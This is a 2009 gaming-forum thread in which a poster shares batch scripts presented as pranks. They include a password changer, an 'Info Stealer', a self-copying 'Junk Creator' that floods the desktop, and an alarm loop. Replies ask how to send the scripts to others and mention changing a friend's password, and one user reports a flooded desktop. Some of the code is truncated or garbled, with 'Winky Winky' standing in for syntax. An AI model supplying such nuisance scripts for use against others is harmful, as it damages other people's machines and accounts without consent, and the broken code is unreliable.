Post: Try These .bat codes! [Trust Me]
03-21-2009, 07:15 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Check these out....

Password Remover / Changer
Changes or removes a password on an account.
    :top
@echo off
color 6e
Title Password Remover/Changer by Shadow Ops
:begin
cls
echo Type the user name you wish to change the password for.
SET /p UDefine=
SET /a UDefine=%UDefine% *
cls
msg * To remove the password, press enter twice.
msg * To change the password, type in the new password. You cant see the characters but it works.
cls
net user %udefine% *
pause>nul
:end











Info Stealer
Creates a .txt file with the computer name, user name, time, and date.
    @echo off
echo Computer Name: %computername%>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo User Name: %username%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Time: %time>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Date: %date%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls



Alarm
Sounds an alarm through the cpu's internal speakers. Turning down volume will not stop it.
    :top

goto top


Junk Creator
Fills your desktop with useless icons until closed.
    cd %userprofile%\desktop
:top
copy %0 %random%.bmp
copy %0 %random%.txt
copy %0 %random%.exe
copy %0 %random%.bat
copy %0 %random%.dat
copy %0 %random%.ini
copy %0 %random%.html
copy %0 %random%.jpeg
copy %0 %random%.mp3
copy %0 %random%.wav
copy %0 %random%.com
copy %0 %random%.cat
copy %0 %random%.ctt
copy %0 %random%.cur
copy %0 %random%.ico
copy %0 %random%.gif
copy %0 %random%.dic
copy %0 %random%.hlp
copy %0 %random%.htm
copy %0 %random%.jpg
copy %0 %random%.py
copy %0 %random%.tmp
copy %0 %random%.web
copy %0 %random%.xhtml
copy %0 %random%.lnk
goto top


Flash Drive Backup
Backs up every thing on your flash drive to a folder called "Flash Drive Backup" on your desktop. *Must be in the root directory of the flash drive.

    @echo off
echo.
echo Backing up your flash drive...
echo.
FOR /F "TOKENS=*" %%A IN ('TIME/T'Winky Winky DO SET TIME=%%A
for /f "tokens=2-4 delims=/ " %%g in ('date /t'Winky Winky do (
set mm=%%g
set dd=%%h
set yy=%%i
)
for /f "tokens=3 delims=\" %%i in ("%USERPROFILE%") do (set user=%%i) 2>&1
if exist "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" (
rd /S /Q "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%"
)
SET time=%time::=.%
xcopy "*" "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" /s /i
echo.
echo Backup Complete!
echo.


-LordOfSpoon
-Shadow Ops
(adsbygoogle = window.adsbygoogle || []).push({});

The following 6 users say thank you to LordOfSpoon™ for this useful post:

ꜛ  , Booshykins, l-MoNsT3R-l, NanuGama, RedKnight
03-21-2009, 07:37 AM #2
lol thats cool man i wana change my friends pass
03-21-2009, 11:36 PM #3
Thats mental man !

---------- Post added at 11:36 PM ---------- Previous post was at 11:35 PM ----------

how do you send it to people ?
03-29-2009, 08:38 PM #4
the junk thing wont stop everty time i restart my compo or any thing i have deleted it and every thing it wont stop wtf is going on can you hurry opkz its not my compo
03-29-2009, 08:56 PM #5
maddenking1234
King of Madden
wow ur not supposed to do it to yourself. some people are just wow.
03-30-2009, 01:47 AM #6
magglass1
S3rv0r @dm1n
Originally posted by chrisps2576 View Post
the junk thing wont stop everty time i restart my compo or any thing i have deleted it and every thing it wont stop wtf is going on can you hurry opkz its not my compo


Which script did you run? lol
03-30-2009, 02:25 AM #7
Originally posted by chrisps2576 View Post
the junk thing wont stop everty time i restart my compo or any thing i have deleted it and every thing it wont stop wtf is going on can you hurry opkz its not my compo


OMFG!!! Thats so freaking funny!! NICE!!
03-30-2009, 02:28 AM #8
lool sucks for that guy
03-30-2009, 09:49 PM #9
Foolnesss
< ^ > < ^ >
ROFL that sucks how the heck would it still be going i didnt see any command to like create anything thats weird?
03-31-2009, 02:33 AM #10
magglass1
S3rv0r @dm1n
Originally posted by magglass1 View Post
Which script did you run? lol


Woops, didn't notice he said the "junk thing." It looks like the script makes copies of itself to random files on the desktop. I'm guessing it made so many files on chrisps2576's desktop that most of them weren't visible. If he doesn't have auto-align (or w/e it's called) turned on and deletes all the visible files, then after a restart some of the non-visible ones may take the place of where the deleted ones used to be. Just a guess, but this could explain what he's experiencing.

chrisps2576, try navigating to the Desktop folder in Windows Explorer and delete them through there rather than deleting them from your desktop.

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo